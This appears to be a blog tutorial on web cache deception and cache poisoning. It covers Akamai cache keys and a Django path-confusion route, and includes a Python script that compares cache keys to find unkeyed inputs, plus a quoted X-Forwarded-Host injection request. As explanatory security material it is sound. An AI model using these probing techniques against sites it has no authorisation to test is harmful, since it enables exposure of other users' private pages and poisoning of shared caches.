<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>The cache</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In computing, a cache is a <i>hardware or software</i> component that stores data so that future requests for that data can be served faster [1]. Hmm, interesting, very interesting. Also, the data stored in a cache might be the result of an earlier computation or a copy of data stored elsewhere [1], so data might be replicated to other locations within the system that serves the content. A <span style="color: red;">cache hit occurs</span> when the requested data can be found in a cache, while a <span style="color: red;">cache miss</span> occurs when it cannot. Cache hits are served by reading data from the cache, which is faster than recomputing a result or reading from a slower data store; thus, the more requests that can be served from the cache, the faster the system performs.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Some companies host their own cache using software like Varnish, and others opt to rely on a Content Delivery Network (CDN) like Cloudflare, with caches scattered across geographical locations. Also, some popular web applications and frameworks like Drupal have a built-in cache. [3]</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwp63ZQzwlq0yE2bPIIUMIPJBnt7CdA2yyUzVBLp24Eit_AN0hiG_pS0AX8jbjotHMfxDzML4hDiWXLk3E0ZbminDcQ2u8iJo39nIDA7fr1oGQR-fmH7MlMzhvKKe8h_w2r_73jW_WOBc/s1600/cache1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: justify;"><img border="0" data-original-height="475" data-original-width="688" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwp63ZQzwlq0yE2bPIIUMIPJBnt7CdA2yyUzVBLp24Eit_AN0hiG_pS0AX8jbjotHMfxDzML4hDiWXLk3E0ZbminDcQ2u8iJo39nIDA7fr1oGQR-fmH7MlMzhvKKe8h_w2r_73jW_WOBc/s640/cache1.png" width="640" /></a></div>
<div style="text-align: justify;">
In the diagram above we have a simplified scenario, where the user has two different paths:</div>
<div style="text-align: justify;">
<br /></div>
<div>
<ul>
<li style="text-align: justify;">1 blue - 2 blue - 3 yellow and 4 yellow </li>
<li style="text-align: justify;">1 blue - 2 blue - 3 orange </li>
</ul>
</div>
<div style="text-align: justify;">
The path to be followed (aka the user's flow of interaction with the target web system) depends on the cache device's internal decision process. The cache device's internal decision process, simplistically speaking, is the algorithm the cache device uses to decide what content will be served, and it is the part we are interested in hacking or subverting. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Cache manipulation</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The following diagram demonstrates how someone can potentially manipulate the web cache to extract sensitive information:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhheGAuH3gINj1pXOFLcqt6NVECt_ESDNkFxa1H3qDYZ-0fcqo-qxWYqa9Y6j7Pu4geDRIHnaf7-77OnJdo-AJghC5ICpnxyAP4o5cId9QGK57rODOpIZdVZqOuCsEmpwOjKVoZnLq633E/s1600/cache2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="583" data-original-width="526" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhheGAuH3gINj1pXOFLcqt6NVECt_ESDNkFxa1H3qDYZ-0fcqo-qxWYqa9Y6j7Pu4geDRIHnaf7-77OnJdo-AJghC5ICpnxyAP4o5cId9QGK57rODOpIZdVZqOuCsEmpwOjKVoZnLq633E/s1600/cache2.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The legitimate user in Step 1 interacts with the web cache system (aka the web server and the front-end web cache) and submits/retrieves sensitive content (which should not be cached in the first place). The hacker assesses the rules the cache server uses to store local user content (e.g. identifies through experimentation which URL paths are stored by the cache server), copies them and starts retrieving sensitive information.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Web caching is a core design feature of the HTTP protocol meant to minimize network traffic while improving the perceived responsiveness of the system as a whole. Caches can be found at every level of a content's journey from the original server to the browser. [6]</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Web caching works by caching the HTTP responses for <u>requests according to certain rules</u>. Subsequent requests for cached content can then be fulfilled from a cache closer to the user.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div>
<b><br /></b></div>
<div>
<b>What usually is cached?</b></div>
<div>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXioN4twyIIYH1Q8tBm4XUrwF-7MNJQyHnvMfHoxhS9e49Ta2YEjZbqvII0SfXxkt3XjCi513LkJr14btUVkY66ear5g7AouzlyEOhG25JMpjkSwNSH0vfJ2meI1-44WGZsyzhR88hZmo/s1600/Dr_Evil.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="240" data-original-width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXioN4twyIIYH1Q8tBm4XUrwF-7MNJQyHnvMfHoxhS9e49Ta2YEjZbqvII0SfXxkt3XjCi513LkJr14btUVkY66ear5g7AouzlyEOhG25JMpjkSwNSH0vfJ2meI1-44WGZsyzhR88hZmo/s1600/Dr_Evil.jpg" /></a></div>
<div>
<br /></div>
<div>
Certain content lends itself more readily to caching than other content. Content that is very cache-friendly for most sites, followed by content that needs more care before it is cached, includes:</div>
<div>
<ul>
<li>Logos and brand images</li>
<li>Non-rotating images in general (navigation icons, for example)</li>
<li>Style sheets</li>
<li>General Javascript files</li>
<li>Downloadable Content</li>
<li>Media Files</li>
<li>HTML pages</li>
<li>Rotating images</li>
<li>Frequently modified Javascript and CSS</li>
<li>Content requested with authentication cookies [6]</li>
</ul>
</div>
</div>
<div style="text-align: justify;">
<b>Putting things in perspective</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In order to understand the importance/complexity of the attack it is better to explain that high-traffic systems (e.g. media content servers) use multiple cache servers. Usually these types of systems assign web cache servers to whole regions (e.g. a USA region cache, an EU region cache). These regions might be whole countries or even continents. Therefore the significance of the impact depends on the following two factors:</div>
<div style="text-align: justify;">
<ul>
<li>The scope of the vulnerable cache servers</li>
<li>The content exposed through the cache servers</li>
</ul>
</div>
<div style="text-align: justify;">
The following diagram demonstrates the issue:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyxdXEe0vqS1eOMwLvhm6Xtgq6HGjWWCjz-Sh6tCMRHoc12tccMHwyc5r8bKE_A3GiI_40qGzE6tscQ9C1yl0A3xx1ykcGWQhAk-2WaWGvBQHjyxOTq0ywUs44IYOqqEsVa25TxU7f1Hw/s1600/cache3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="551" data-original-width="601" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyxdXEe0vqS1eOMwLvhm6Xtgq6HGjWWCjz-Sh6tCMRHoc12tccMHwyc5r8bKE_A3GiI_40qGzE6tscQ9C1yl0A3xx1ykcGWQhAk-2WaWGvBQHjyxOTq0ywUs44IYOqqEsVa25TxU7f1Hw/s1600/cache3.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The following diagram demonstrates a complicated infrastructure on cache management:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivp88L4WnvWTuYOFHULCdYpgzKpSSaCEOgUf0k_WV8XDt5TKd6X-QxDX6Hga9Iwh0sW7bbtw88QDif5kHDe4AxipWKgu9vma3NzERN5poi4GDHRJFIVOUdwSobhr3r31uCngOYLofksZQ/s1600/push-preload-large-opt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="390" data-original-width="937" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivp88L4WnvWTuYOFHULCdYpgzKpSSaCEOgUf0k_WV8XDt5TKd6X-QxDX6Hga9Iwh0sW7bbtw88QDif5kHDe4AxipWKgu9vma3NzERN5poi4GDHRJFIVOUdwSobhr3r31uCngOYLofksZQ/s640/push-preload-large-opt.png" width="640" /></a></div>
<div style="text-align: justify;">
<b><br /></b>
<b>Note:</b> In order for an attacker to attack the system she would have to assess the set of the rules of all the intermediate cache proxies.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Web cache criteria </b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Web caching works through so-called "web cache keys". A web cache key is an identifier of a resource located on the web server. As a case study we will refer to the Akamai community posts to see how web cache keys are configured.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The following section is based on a community post describing the concept of the Akamai Cache Key. This information is deduced from several Akamai configuration settings posted in the past. The issues discussed are:</div>
<div style="text-align: justify;">
<div>
<ul>
<li>How does the Edge Server know which file needs to be cached?</li>
<li>How does the Edge Server retrieve the cached object from the “Cache Store”?</li>
</ul>
</div>
</div>
<div style="text-align: justify;">
<b>Note1:</b> Content is cached in the so-called “Cache Store”. The “Cache Store” represents either the memory (RAM) or the hard disk of a certain Edge Server.</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Note2: </b>An Akamai Edge server is a cache server delivering content. To retrieve an object from the Akamai Platform, users must connect to an Akamai Edge server first. The server must apply a set of rules to the request, and then either locate the object in its cache or retrieve it from the origin. [12]</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Note3:</b> Also see sources [9] and [10].</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The following diagram demonstrates a simple topology of an Akamai network:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8DYEwr3lS7QMiVxJ2_lS8cGciSZC82kI82MWTO3XX0VOJiWTvqqDBOjHV8t9jixu88DZM-Q5NUBRvS4i8X8epEa7G3L05w6KF2LCQfjAOrqN0owHKiFjqXKcpn6C8AS0KiyN17BVg7GA/s1600/akamai-ip-accelerator-overview-image.webp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8DYEwr3lS7QMiVxJ2_lS8cGciSZC82kI82MWTO3XX0VOJiWTvqqDBOjHV8t9jixu88DZM-Q5NUBRvS4i8X8epEa7G3L05w6KF2LCQfjAOrqN0owHKiFjqXKcpn6C8AS0KiyN17BVg7GA/s640/akamai-ip-accelerator-overview-image.webp" width="640" /></a></div>
</div>
<div style="text-align: justify;">
<div>
<br /></div>
<div>
To store an object in the Edge Server “Cache Store” we need to create the “Cache Key” first. The EdgeSuite Configuration Guide mentions that the Akamai Edge Server forms the “Cache Key” based on parts of the "Request ARL". [11]</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div>
The ARL (Akamai Resource Location) is similar to a URL. The primary function of an ARL is to direct an end user’s request for an object to the Akamai network [13]. The ARL also contains the object’s caching properties. The difference is that the ARL is specifically defined for objects to be served via the Akamai Network. There are two types of ARLs:</div>
<div>
<ol>
<li>ARL v1: This is the original ARL used in the earlier days of Akamai. It contains instructions for the Edge Server coded into its structure.</li>
<li>ARL v2: Instead of coding all instructions into the URL as is done for ARL v1, ARL v2 references a configuration file hosted on the Edge Server.</li>
</ol>
</div>
</div>
<div style="text-align: justify;">
<div>
ARL Components which form the Cache Key:</div>
<div>
<ul>
<li>Typecode</li>
<li>Forward [fwd] path (origin server, pathname, filename and extension)</li>
<li>Query string (Optional)</li>
<li>Secure Network Delivery Indicator</li>
<li>HTTP Method (GET, HEAD, etc.)</li>
</ul>
</div>
<div>
<b>Note: </b>The following description applies mainly to ARL v2; we are not going to elaborate on ARL v1 as it is not used that often nowadays.</div>
</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
The following diagram breaks down the ARL format:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAcUGIxRDUwwnAwXZWYqdZ03wKDwffZLm49lMJwf0pieH3lYsryrk1y5mLsKOCXXx-3T0rLeV-TZl1p9TsXXz5_BGSESFSbbHXSAwp8ikvYX2IaGA0gEaLXi0Vq8FV8cPdtMKbE7O-86M/s1600/GUID-F9D80DE4-26FB-4CEF-85EE-4E56C7E1AC24-low.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="292" data-original-width="1200" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAcUGIxRDUwwnAwXZWYqdZ03wKDwffZLm49lMJwf0pieH3lYsryrk1y5mLsKOCXXx-3T0rLeV-TZl1p9TsXXz5_BGSESFSbbHXSAwp8ikvYX2IaGA0gEaLXi0Vq8FV8cPdtMKbE7O-86M/s640/GUID-F9D80DE4-26FB-4CEF-85EE-4E56C7E1AC24-low.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
The following section demonstrates the web cache keys using sample HTTP requests:</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Request:</b></div>
<div style="text-align: justify;">
<div>
<br /></div>
<blockquote class="tr_bq">
<i>GET /products.jsp?productId=1 HTTP/1.1</i><br />
<i><span style="color: red;">host: shop.edgegate.de</span></i><br />
<i>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0</i><br />
<i>Accept: */*</i><br />
<i><span style="color: red;">Pragma: akamai-x-get-cache-key</span></i></blockquote>
<div>
<br /></div>
</div>
<div style="text-align: justify;">
<b>Response:</b></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<blockquote class="tr_bq">
<i>HTTP/1.1 200 OK</i><br />
<i>Content-Type: text/html; charset=iso-8859-1</i><br />
<i>Server: Google Frontend</i><br />
<i>Cache-Control: private, max-age=0</i><br />
<i>Expires: Thu, 17 Dec 2015 00:00:06 GMT</i><br />
<i>Date: Thu, 17 Dec 2015 00:00:06 GMT</i><br />
<i>Content-Length: 1127</i><br />
<i><span style="color: red;">X-Cache-Key: /L/1168/78685/1m/edgegatecpinotossi.appspot.com/products.jsp?productId=1</span></i><br />
<i>Connection: keep-alive</i></blockquote>
<div>
<b>Note:</b> The text marked in red designates the debug request header and the web cache key returned by the edge. </div>
<div>
<i><br /></i></div>
<div>
The following table explains the values used as web cache keys:</div>
</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<table data-aura-rendered-by="54:179;a" style="background-color: white; border-collapse: collapse; border-spacing: 0px; box-sizing: border-box; color: #333333; font-family: Ubuntu; font-size: 13.8px; overflow-wrap: normal; width: auto; word-break: normal;"><tbody style="box-sizing: border-box;">
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="background-color: #999999; box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: white; font-family: "arial"; font-size: 14.6667px;">Name</span></td><td colspan="1" rowspan="1" style="background-color: #999999; box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: white; font-family: "arial"; font-size: 14.6667px;">Value</span></td></tr>
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">Typecode</span></td><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">L</span></td></tr>
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">Serial</span></td><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">1168</span></td></tr>
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">CPCode</span></td><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">78685</span></td></tr>
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">TTL</span></td><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">1m</span></td></tr>
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">fwd Path</span></td><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;"><a href="http://edgegatecpinotossi.appspot.com/products.jsp" rel="noopener" style="background-color: transparent; box-sizing: border-box; color: #049cd4; cursor: pointer; text-decoration-line: none; transition: color 0.1s linear 0s;" target="_blank">edgegatecpinotossi.appspot.com/products.jsp</a></span></td></tr>
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">Query String</span></td><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">?productId=1</span></td></tr>
</tbody></table>
</div>
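<div style="text-align: justify;">
As an added example (it is not code from the original post or from Akamai's documentation), the following Python parses an <i>X-Cache-Key</i> value into the fields of the table above and then compares the keys returned for a series of request variants, which is the practical reason for fetching the key in the first place: an input that changes the key is keyed, an input that leaves it unchanged is unkeyed and therefore a cache poisoning candidate if the origin reflects it. The baseline key is the one shown above; the other probe keys are constructed for illustration, and the field layout (typecode / serial / CP code / TTL / forward host and path / query string) is taken from the table.</div>

```python
"""Parse Akamai X-Cache-Key values (returned when a request carries
Pragma: akamai-x-get-cache-key) and compare keys across request variants.
Added example: the field layout follows the table above; the probe keys
below are constructed for illustration."""
import re
from dataclasses import dataclass

_TTL_UNITS = {"s": 1, "m": 60, "h": 3600, "d": 86400}


@dataclass(frozen=True)
class CacheKey:
    typecode: str      # e.g. "L"
    serial: int        # e.g. 1168
    cpcode: int        # e.g. 78685
    ttl_seconds: int   # "1m" -> 60
    fwd_host: str      # origin host the edge forwards to
    fwd_path: str      # forwarded path, with leading "/"
    query: str         # "?productId=1", or "" when the query string is not keyed


def parse_ttl(ttl: str) -> int:
    """Convert an Akamai TTL token such as '1m', '30s', '2h' or '7d' to seconds."""
    m = re.fullmatch(r"(\d+)([smhd])", ttl)
    if not m:
        raise ValueError(f"unrecognised TTL token: {ttl!r}")
    return int(m.group(1)) * _TTL_UNITS[m.group(2)]


def parse_cache_key(value: str) -> CacheKey:
    """Split '/L/1168/78685/1m/host/path?query' into its components.

    The first four slash-separated fields are fixed; everything after the TTL
    is the forward path (host + path) plus an optional query string.
    """
    parts = value.strip().split("/", 5)
    if len(parts) != 6 or parts[0] != "":
        raise ValueError(f"unexpected cache key layout: {value!r}")
    _, typecode, serial, cpcode, ttl, fwd = parts
    fwd, qmark, query = fwd.partition("?")
    host, _, path = fwd.partition("/")
    return CacheKey(typecode, int(serial), int(cpcode), parse_ttl(ttl),
                    host, "/" + path, qmark + query)


def keyed_inputs(probes):
    """probes: [(label, x_cache_key), ...]; the first entry is the baseline request
    and each later one changes exactly one input (a query value, a header, ...).

    Returns {label: True} when that input altered the key (it is keyed) and
    {label: False} when the key stayed the same (it is unkeyed, so it is a
    candidate for cache poisoning if the origin reflects it).
    """
    baseline = parse_cache_key(probes[0][1])
    return {label: parse_cache_key(key) != baseline for label, key in probes[1:]}


# Constructed probe set: the baseline is the key from the page; the other two
# keys are what one would expect if productId is keyed and X-Forwarded-Host is not.
BASELINE_KEY = "/L/1168/78685/1m/edgegatecpinotossi.appspot.com/products.jsp?productId=1"
EXAMPLE_PROBES = [
    ("baseline", BASELINE_KEY),
    ("productId=2", "/L/1168/78685/1m/edgegatecpinotossi.appspot.com/products.jsp?productId=2"),
    ("X-Forwarded-Host: canary", BASELINE_KEY),
]

if __name__ == "__main__":
    print(parse_cache_key(BASELINE_KEY))
    print(keyed_inputs(EXAMPLE_PROBES))
```

<div style="text-align: justify;">
In a real engagement each probe key comes from one request that differs from the baseline in a single input; keep the host, path and query identical while varying headers, so that only the input under test can explain a changed key.</div>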
<div style="text-align: justify;">
<b><br /></b>
<b>Before the attack: Reconnaissance</b><br />
<b><br /></b>
Before progressing with any type of cache manipulation it is worth the trouble to review the route to the targeted web server. Running a Robtex query on google.com gives a lot of information that can be used to check whether a cache proxy is in use.<br />
<br />
Below you can see an extract of the Robtex output (https://www.robtex.com/dns-lookup/google.com#owhois):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhldy7fvuz7EAA3erROc1SxBdNnGFyhXc7Cpo2hIe7QkCP68jDX5XFXm3tc3r7Qlrx6mh0MjORJTBVWHRpQsp8HsILObUQ8nbhMW8ECogN2VE4eFbHxOA-eXbmuveZVORgKucTiKI8xrHA/s1600/Graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="453" data-original-width="742" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhldy7fvuz7EAA3erROc1SxBdNnGFyhXc7Cpo2hIe7QkCP68jDX5XFXm3tc3r7Qlrx6mh0MjORJTBVWHRpQsp8HsILObUQ8nbhMW8ECogN2VE4eFbHxOA-eXbmuveZVORgKucTiKI8xrHA/s640/Graph.png" width="640" /></a></div>
<br />
<b><br /></b></div>
<div style="text-align: justify;">
<b>Note:</b> Also use other manual checks to see whether a cache proxy sits in front of the web service, e.g. inspecting response headers such as <i>X-Cache</i>, <i>Age</i>, <i>Via</i> and <i>Server</i>, and sending the same request twice to see whether the second one is reported as a cache hit.<br />
<br />
<b><br /></b>
<b>Finally the attack: Web Cache deception</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Web cache deception occurs when the target website is configured to be "flexible" about which paths (URLs) it handles. For more information on what a URL is see <a href="https://www.rfc-editor.org/info/rfc1738">https://www.rfc-editor.org/info/rfc1738</a> . This makes sense from a usability perspective, e.g. a product that is tolerant of certain inputs is more user friendly. It also depends on how each software vendor interprets the RFCs related to URL structure, and the web server and the cache in front of it rarely interpret them identically.<br />
<br />
In particular, the issue arises when requests to a path that doesn't exist (say /x/y/z) are treated as equivalent to requests to a parent path that does exist (say /x). For example, what happens if you get a request for the nonexistent path /newsfeed/foo? Depending on how your website is configured, it might just treat such a request as equivalent to a request to /newsfeed. For example, if you're running the Django web framework, the following configuration would do just that because the regular expression ^newsfeed/ matches both newsfeed/ and newsfeed/foo (Django routes omit the leading /): [14]</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<blockquote class="tr_bq">
<i>from django.conf.urls import url</i><i><br /></i><i>patterns = [url(r'^newsfeed/', ...)]</i></blockquote>
</div>
<div style="text-align: justify;">
And here's where the problem lies. If your website does this, then a request to /newsfeed/foo.jpg will be treated the same as a request to /newsfeed. But a web cache, seeing the .jpg file extension, will think that it's OK to cache the response, because most web cache proxies by default store content with image file extensions regardless of what the origin actually returned. [14]<br />
<br />
Below we can see a schematic analysis of the issue:<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizeF0JDAxTXxoRoeL-nEsO6jIFkZ0pbEWPgjBNJJDv9iE1L1gzY86oOF2YZEEZlZknCk-om4G9BkRX4TB8RsH9G5bpE4yN-hPo7CRST5pKjcoLtl7egrYBUuiQZLRi9hSDOSgrrk7SxBE/s1600/URL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="392" data-original-width="548" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizeF0JDAxTXxoRoeL-nEsO6jIFkZ0pbEWPgjBNJJDv9iE1L1gzY86oOF2YZEEZlZknCk-om4G9BkRX4TB8RsH9G5bpE4yN-hPo7CRST5pKjcoLtl7egrYBUuiQZLRi9hSDOSgrrk7SxBE/s1600/URL.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<b>Note:</b> In the diagram above we can see how a malicious user can obtain the victim's home page from the cache. It is assumed that the home page contains sensitive information and requires some kind of login, and that the cache server stores local copies of the site's images.<br />
<br />
It is also worth saying that this is a simplified scenario; someone who would like to perform a more complicated attack would have to:<br />
<ul>
<li>Understand the scope of the cache server e.g. region cache server.</li>
<li>Understand the cache rules of the cache server e.g. Akamai ARL etc.</li>
<li>Identify target content of interest e.g. sensitive content etc. </li>
</ul>
</div>
<div style="text-align: justify;">
<b>Note:</b> It is also worth mentioning that identifying how both the web server and the cache server "understand" the URL structure is important, e.g. experimenting with malicious paths such as mangled back slashes, encoded separators, semicolons and so on. This also relates to what the browser considers an acceptable URL, since the victim's browser has to send the crafted request.<br />
<b><br /></b>
<b><br /></b>
<b>Finally the attack: Web Cache poisoning </b><br />
<b><br /></b>
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users. The following diagram shows the process to follow:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfuCfyZnhHjpQxL3KRBpJ4VOQoxmH23krl0cwNIFBWm4JPZC3LP2j_uufivVd7lslArZRhkkuKX-auJufJ4wE1v5Jhjp01MzayDEQp17-UmQ6ONYOgNr9tQeJaBpu4wB9yx9V25bebtA0/s1600/poison.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="379" data-original-width="633" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfuCfyZnhHjpQxL3KRBpJ4VOQoxmH23krl0cwNIFBWm4JPZC3LP2j_uufivVd7lslArZRhkkuKX-auJufJ4wE1v5Jhjp01MzayDEQp17-UmQ6ONYOgNr9tQeJaBpu4wB9yx9V25bebtA0/s1600/poison.png" /></a></div>
James Kettle (aka @albinowax) has done an amazing job documenting the vulnerability and wrote about multiple scenarios and ways to exploit it. More specifically, he described the following scenarios:<br />
<ul>
<li>Selective Poisoning</li>
<li>DOM Poisoning</li>
<li>Hijacking Mozilla SHIELD</li>
<li>Route poisoning</li>
<li>Hidden Route Poisoning</li>
<li>Chaining Unkeyed Inputs</li>
<li>Open Graph Hijacking</li>
<li>Local Route Poisoning</li>
<li>Internal Cache Poisoning</li>
<li>Drupal Open Redirect</li>
<li>Persistent redirect hijacking</li>
<li>Nested cache poisoning</li>
<li>Cross-Cloud Poisoning</li>
</ul>
A simplified version of an attack scenario would be to:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdrjo2VdndRk9eZNSGrW61uQPbgJj47oORBrFZxb5Gs3FA-m5rWrIqHbY_-RFcHmIimlncmtUq7tnj2fv2TkhO-gmeCsQLlpJQOIHxGVGUZ6U1VX0Mg7d-16jJuR-on50jBhSfNcKiYvA/s1600/poison1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="423" data-original-width="695" height="389" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdrjo2VdndRk9eZNSGrW61uQPbgJj47oORBrFZxb5Gs3FA-m5rWrIqHbY_-RFcHmIimlncmtUq7tnj2fv2TkhO-gmeCsQLlpJQOIHxGVGUZ6U1VX0Mg7d-16jJuR-on50jBhSfNcKiYvA/s640/poison1.png" width="640" /></a></div>
A simple example of web cache poisoning: assume the X-Forwarded-Host HTTP header is unkeyed (it is not part of the cache key) but the application reflects it in the response. We can then inject our own value and have it echoed back from the cache to every user whose request maps to the same key.<br />
<br />
This is taken from https://portswigger.net/blog/practical-web-cache-poisoning :<br />
<br />
<b>Request:</b><br />
<br />
<div style="text-align: left;">
<i>GET /en?cb=1 HTTP/1.1</i></div>
<div style="text-align: left;">
<i>Host: www.redhat.com</i></div>
<div style="text-align: left;">
<i><span style="color: red;">X-Forwarded-Host: canary</span></i></div>
<b><br /></b>
<b>Response:</b><br />
<b><br /></b>
<i>HTTP/1.1 200 OK</i><br />
<i>Cache-Control: public, no-cache</i><br />
<i>…</i><br />
<br />
<i>&lt;meta property="og:image"<span style="color: red;"> content="https://canary/cms/social.png" /&gt;</span></i><br />
<b><br /></b>
